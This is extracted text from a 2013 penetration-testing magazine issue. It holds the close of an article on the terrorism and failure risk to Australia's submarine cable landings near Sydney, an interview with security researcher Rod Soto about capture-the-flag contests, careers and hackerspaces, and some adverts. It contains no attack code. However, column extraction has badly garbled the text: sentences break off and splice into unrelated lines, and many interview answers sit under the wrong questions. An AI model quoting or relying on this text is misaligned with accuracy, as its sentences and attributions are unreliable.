Risk of Failure and Terrorism
much of the foreign connectivity is key (foreign
The point of this paper is to highlight two types of risk. Whilst there is capacity to spare on the cur rent connectivity into Australia, the connections into a common unprotected area (Paddington in
payments, travel, international finance exchange,
New South Wales, for example) does represent a risk of acts of God, dragged anchors, or terror -
about making sure confidentiality and integrity are
ism. The slow down due to reduced capacity if the east coast connections were lost would force all traffic to exit the country via Perth, and in country connections and the external connection are un-
likely to be able to cope. This would lead to use of the satellite links and higher up the software stack there would be failures; eventually leading to timeouts, a backing up of traffic in financial transactions, and a major financial impact or ruin for companies or even the country depending on how long the problem existed. This isn’t just a problem for the nation as a whole, but is something that must be considered in application and infrastructure design for global systems. Latency must be considered when siting web channels for distributed systems; particularly where
frameworks that use the codebehind architecture (for example, JSP, ASP.NET, etc) to minimise client
Figure 2. McMahons Point Submarine Cable Terminus – Sydney
StartKit 01/2013(01)
web searches, etc) that the impact of its loss would be a major problem. So, when doing penetration testing – which is all covered from a security point of view but availability is considered, thought must be given to the impact of latency under normal conditions, abnormal high traffic conditions due to connectivity issues, and complete failure of the connections. These can cause failure of the application or invocation of the disaster recovery procedures. One of the techniques that is not often used, but which is very effective, is failure mode event analysis (FMEA) – a tool borrowed from the aircraft in -
dustry. In this, events are talked through to work out what would happen when a failure occurs; using the whole stack end to end. In this, it has of ten been found that the combination of high availability solutions can result in such an increase in complexity and unpredictable behaviour that availability is reduced. When doing FMEA on a global system the increased latency or failure of international connectivity must be considered and the way the system will behave on failure and recovery understood and catered for. The impact on the system and the owning company may be significant. However, what about the wider impact? Australia is a successful country, as well as being a beautiful and friendly one, but without communications to the outside world the financial and social impact would be enormous. Having five connections into the same area of the nation with only one older alternative on the other side of the country is
an enormous risk. When the national broadband network initiative delivers the increased bandwidth requirements makes recovery even harder, so increasing the risk. Page 60
http://pentestmag.com
What Should be Done? The first steps to protecting the nation, and the applications that run in it, is to protect the existing cables coming into the country. A sign informing potential terrorists and nothing else is not exactly adequate protection. In Egypt activist scuba divers tried to cut and destroy the cables. So, a genu-
ine protective area from maritime attack is needed – although this would be difficult in an area as busy as Sydney harbour! However, at the very least the connection transition onto land should be secured, with barbed wire and monitoring; and a large sign probably wouldn’t be advisable. Having the majority of the connections so important to the country coming into the same place is also ill advised. Additional connections into Australia, coming into a different location than Sydney on the east coast; along with additional connections on the west coast are desperately required – along with the acceptance that satellite connectivity is not a real answer due to the latency, which will cause
timeouts and failures higher up the software stack.
Conclusion Security assessments aren’t only about confidentiality and integrity, but about availability as well – forming the CIA triad – and in a global system that
must include an understanding of the oceanic links into a country. With Australia there are five connections into one area on one side of the country and one into the other side, and these connections are not well protected – which leads to a considerable risk from both accidental damage and terror ism. This would not just cripple a global distributed system, but the country as a whole. The increased
latency of satellite links means that these are not a suitable backup solution, so new connections elsewhere into the country are needed.
COLIN RENOUF Colin Renouf is a long standing enterprise solutions architect with thirty years experience in the industry – concentrating on the finance sector. He has authored many magazine articles ranging from Unix, through Java and on to security; and has also written and contributed to books on the subject. He is currently contracting for a well known credit card company, but his main loves are Australia and some of its people, singing, photogra phy and just being with good company. Oh, and quantum physics as he is an eternal scientist.
StartKit 01/2013(01)
INTERVIEW
Interview with Rod Soto Rod Soto is a security researcher and board member of HackMiami. He is a regular speaker at hacking conferences all over the country on the topics of penetration testing tools and methods, as well as the topic of digital civil liberties. Rod Soto was the winner of the 2012 Black Hat Las Vegas Capture the Flag hacking competition, and is the founder and lead developer of the Kommand&&Kontrol competitive hacking tournament series. He is currently a senior security engineer with the emergency response team of an information security corporation engaged in digital crime intelligence analysis, vulnerability assessments, penetration testing, and malware reversal.
StartKit 01/2013(01)
Page 62
http://pentestmag.com
You won the Black Hat hacking competition last year. How were you preparing for this competition? Is there any way to prepare? What advice you would give to those who would like to try themselves in such competition?
to learn completely new things and in many cases with a high level of dificulty.
It was not easy and it took a lot of effort. I advise
There are many books you can read or cours es you can take but in reality you need a base knowledge and understanding in networking,
those who want to get better at playing CTFs to play as many as they can, save and follow write ups of those challenges you couldn't get and study and research as much as you can. Create your own lab and create challenges.
How do you improve your skills? Do you have any methods that have proven to be more effective than others? Could you share some with our readers?
Do you have any suggestions for our readers? Especially for those who would like to become pentesters?
operating systems, programming/scripting languages, application vulnerabilities and finally exploit creation even if you will never create one yourself.
Are there any specific personality traits that one should have in order to achieve success? What personality features are valued in this job?
Improving your skills depends on your dedication and willingness to learn new things. You need to be up to date and willing to learn new technologies and techniques that may not be easy at first and that require studying hard.
Why did you choose Information Security field for your profession instead of other Information Technology domains?
Like many jobs I believe patience, persistence, tolerance to frustration, a strong work ethic and abil ity to adapt to change are fundamental personality traits needed to be successful.
What are the top 5 challenges for the junior IT professional who would like to learn and master skills in Information Security?
My background is mainly in system architecture, integration and administration. Throughout the years I became more focused on Information Security as it became more significant in the orga-
nizations I was working for, plus I always thought of information security as a very challenging and changing industry.
What do you consider so challenging in the field of Information Security? It seems that you have a thing for competitions, is this it or something else as well?:)
• • • • •
Orientation on career direction
Efcient learning habits Mentorship Financial Aid Time
Sounds like a good plan, but how to find a mentor? How did you found yours? I am mostly self taught. I did take some courses and read lots of books but as far as a mentor – I have never had one nor do I have one now. I did
I do... :) It is a way of challenging myself to learn new things and to face and adapt to unknown sce-
find lots of help by attending a local hackerspace HackMiami and I met some great people at DEF -
narios.
CON. Basically going into the community helped me a lot when I was trying to learn new things. Finding a mentor is not easy but there are certainly people in the community that are willing to help
What were the biggest challenges that you have ever experienced in the past, especially when you worked as a Junior Information Security professional?
newcomers. We do that at HackMiami.
Mostly access to the right information, I started becoming more knowledgeable as I started net-
working with colleagues, going to conferences and visiting hackerspaces. In many aspects of infosec you pretty much have to become an autodidact. You have to put in time, discipline and persistence
StartKit 01/2013(01)
Could you give few examples of learning habits that appeared to be efficient in your case? Maybe this will inspire our readers to look for their own... I read at least one relevant book per month, I recreate as many vulnerabilities as I can as they are
Page 63
http://pentestmag.com
INTERVIEW published in my own lab. If I find I need to learn further about certain application or technology I then
sionals and we focus on information security re-
research about white papers, books and authors.
that focuses on open source robotics and general
search and education. We also have a maker wing maker projects.
On the basis of your experience and expertise, what is the best methodology for learning and mastering Information Security? Patience, persistence, discipline and the ability to tolerate frustration. This is not a field for the faint of heart.
How is the career path for being Information Security professional in terms of salary and position? Is the Information Security professional career path more promising and better than other IT professions?
This maker wing sounds great. Could you tell us more about it? On what projects you are working on now? Current projects are: Un-maned submarine, Micro drones, Fighting robots. Here is a video of the quadcopter built by one of our members: http:// www.youtube.com/watch?v=qn9Eq1mJ6Ks.
Could you describe one of the completed and successful projects of this open source section? See quadcopter video.
Right now it is. the Information Security job market is dominated by employees. There are simply not enough people and there probably won't be for the
near future. Financially speaking It is definitely one of the best places to be in the IT industry. As a career it has also become a very relevant and challenging field, but as with any industry one should not rely on it for unsubstantiated longevity.
What are the best pentesting tools in your opinion? Could you recommend some to our readers? I am metasploit kind of guy but I always try to replicate vulnerabilities and exploits without using it. I think burp and acutenetix are great webscanners and of course there are plenty of open source tools. I look at pentesting as mix and match. I al-
ways have to be prepared to think outside the box and try new tools some of them I have to learn on the run.
What are your favorite methods for penetration tests? The ones you consider the most effective? Do you have a set with which you start each task? Know your target very well and your tools and the
rest will follow. Take your time to footprint, analyze and understand the environment you are probing.
There are no "one" clicks.
It is not easy. There are many challenges starting from financial support, potential liability and dealing with many different personalities. At the end of the day it depends on people's willingness
to participate and support the hackerspace. You can always find a place to meet but if people are not showing up or participating then you won't get very far.
Malware, trojan as well as the latest cyber attacks are often ahead and unpredictable compared with most of the information security technology and tools. What suggestions do you have to prevent and minimize these kind of attacks? I do believe that offense must drive defense. Understanding, analyzing, reversing and using malicious tools in your own lab environment will pro-
vide you the ability to visualize malicious attacker's mindset and preferred attack vectors. You can never be 100% secure but you can minimize and mitigate potential threats by keeping yourself up to date on tools, vulnerabilities and doing your own research, not only technical but also using open source intelligence tools.
What does HackMiami do? Is it a Information Security platform/group for Information Security minded people? HackMiami is hackerspace based in Miami, FL. It is composed of mostly information security profes-
StartKit 01/2013(01)
There are some areas that don't have such a nice initiative like HackMiami yet. Is it hard to establish a hackerspace? What things are required?
Could you recommend some good links or reads about creating your own lab environment?
Page 64
http://pentestmag.com
There are 3 books that
ficult to prove. There are many methods and tools though that may give you a certain level of confidence
will get you started in my opinion. One of then is Metasploit the Pentester Guide. Second is Professional Penetration Testing and third I would recommend the Web Application
that an attack came from a specific source. Again there will be a level of uncertainty. As to how an organization or country deals with that level of uncertainty would depend on their own policies and rules of engagement.
Hacker's Handbook.
How should one proceed with their own research? Could you give some tips for those who haven't done it yet?
What is the most dangerous, unpredictable and untraceable cyber attacks that happened in the past few years based from your experience? Which industry was the main target of this kind of attack?
Set up your lab. It does not cost much but it is important to have your own environment where you can ex-
periment and break things without getting in trouble. You can use some of the open source hypervisors and operating systems publicly available on the internet.
I have seen attacks directed to certain industries such as financial, infrastructure and major corporations. I definitely believe that SCADA infrastructure attacks are the most po-
What are best open source intelligence tools in your opinion? I think our readers will be interested in this very much.
tentially dangerous attacks and the ones that may like-
In my opinion those tools have yet to be developed. I have experimented with some commercial and open source tools and I
ly cause human casualties. I am not aware such event has happened yet, although governments and military contractors are training for these types of attack scenarios, both of fensive and defensive. If a
do not think they are at the right place yet. There is a
lot of work to be done in
large scale SCADA attack takes place that results in loss of life, the most like-
this area.
If there were cyber attacks targeted a specific destination at the specific country, would that be possible to trace back the attacker(s) accurately?
ly culprit would be a state
sponsored attack.
How did it happen you became a founder and developer of competitive hacking tournament series?
Attribution is always very challenging and very dif-
StartKit 01/2013(01)
Page 65
http://pentestmag.com
INTERVIEW I wanted an excuse to hang out with my friends
believe that those technologies change attack
and party doing what we love the most :). I thought
methodologies I believe they simply add more attack surface and possible single points of failure for many organizations. Organizations must be careful of putting all their eggs in the "cloud", I myself have been involved in situations where cloud outages presented a level of availability that organizations were simply not willing to tolerate.
it was cool to travel and do it in different places with
different people and make it fun and challenging.
What was your objective to form Kommand && KonTroll competitive hacking tournament series? Kommand && KonTroll is a computer security competition in a private environment where players are faced with different challenges. Most of those challenges are web based or infrastructure. We also have some binary reversal challenges,
but that is not our focus. We try to make it as close to the "trenches" as we can, as we try to give players a view of the underground. We use publicly available software and vulnerabilities, or we modify targets to be vulnerable. The game also implies defense as players are allowed to at-
tack other players. This game allows players to learn, experiment and practice with many information security tools and wares that they would
You give talks about digital civil liberties... What are the biggest threats in this area for computer users and mostly for security specialists and pentesters? I gave a talk at DEFCON XX Skytalks along with some of my colleagues where we warned that regulation of such tools was not farfetched, and the need to address these tools as a right for law abiding citizens to research, study and to defend themselves. It does look though we are marching to wards more regulation and possibly strict limitation
and even prohibition like in some countries.
otherwise not be able to use or work with at their
As far as digital civil liberties are concerned, what is your opinion about “hacktivism”? Is it a good way to prove the politicians wrong?
current organizations.
How do you prepare the tasks for such tournament? Does it take long? Where you are searching for inspiration?
I am all for the right of people to dissent and pro-
Yes it takes long... between 100 to 150 hours. I do
test as long as they do not break the law.
heavy research on scenarios, cultures, characters, personalities, music, videos, history and real life scenarios. Every challenge tells a story, in some instances challenges could branch into whole new
Do you have any plan to setup your own Information Security company in the future?
ctf. I try to make it relevant and I try to make it fun.
I have my own IT company called EITS and I also
I distribute challenges difficulty level in a way that
do work with with Information Security Services,
allows players with different skills to be able to play
Inc out of Miami, FL
and win the ctf.
You are involved in digital crime intelligence analysis, can you tell us more about it? I can't without breaking my NDA. Sorry.
Can you tell us few words about EITS? How it started and what kind of solutions/ products it offers? My work was mostly system administration and support. It is now more towards security assessments and penetration testing.
Cloud Computing and Virtualization technologies are getting more popular day by day. Do you think both technologies might be a new target for cyber attacks? Have you ever discovered the latest attack techniques done by attackers in Cloud Computing environment?
Thank you Rod for this interview. By PenTest Team
I do believe those technologies definitely intro-
duce new risks and vectors of attacks. I do not StartKit 01/2013(01)
Page 66
http://pentestmag.com
Cyber Security Industry Transaction Map 2004-2013
Our Role
Our Advantage
Delling Advisory is a boutique advisory firm, providing merger and acquisition related consulting, advisory and transactional services to companies in the information security industry.
We have unsurpassed industry knowledge built through a successful career in the information security market in Australia, and as a principal in transactions buying, merging, and selling companies in the information security industry.
www.dellingadvisory.com www.dellingadvisory.com/blog (Research)
School
TecnoCampus Barcelona Summer School
SUMMER SCHOOL PROGRAMMES 8 - 19 JULY 2013
TecnoCampus
TWO-WEEK COURSES WITH ENGLISH TUITION AND COMPLEMENTED WITH SOCIAL, CULTURAL, SPORT AND LEISURE ACTIVITIES
SUMMER COURSE ON INFORMATION TECHNOLOGIES (IT) 1
SUMMER COURSE ON RENEWABLE ENERGIES
SUMMER COURSE ON INFORMATION TECHNOLOGIES (IT) 2
SUMMER COURSE ON BUSINESS ADMINISTRATION
SUMMER COURSE ON VIDEO AND MUSIC
SUMMER COURSE ON TOURISM
SUMMER COURSE ON CINEMA
SUMMER COURSE ON INTERNATIONAL HEALTH
OUR PROGRAMME INCLUDES: • • • • • • •
Tuition in English Attendance certificate issued by the university Access to our state-of-the-art facilities Library access Cultural experience Local sport centres and facilities Bus transport from and to Barcelona airport, if travelling in group or at agreed times
This academic program will be complemented with a culture, social and leisure program (optional)
Email: [email protected] Tel.: Juan García on 00 34 93 169 65 32 tecnocampus.cat/summerschool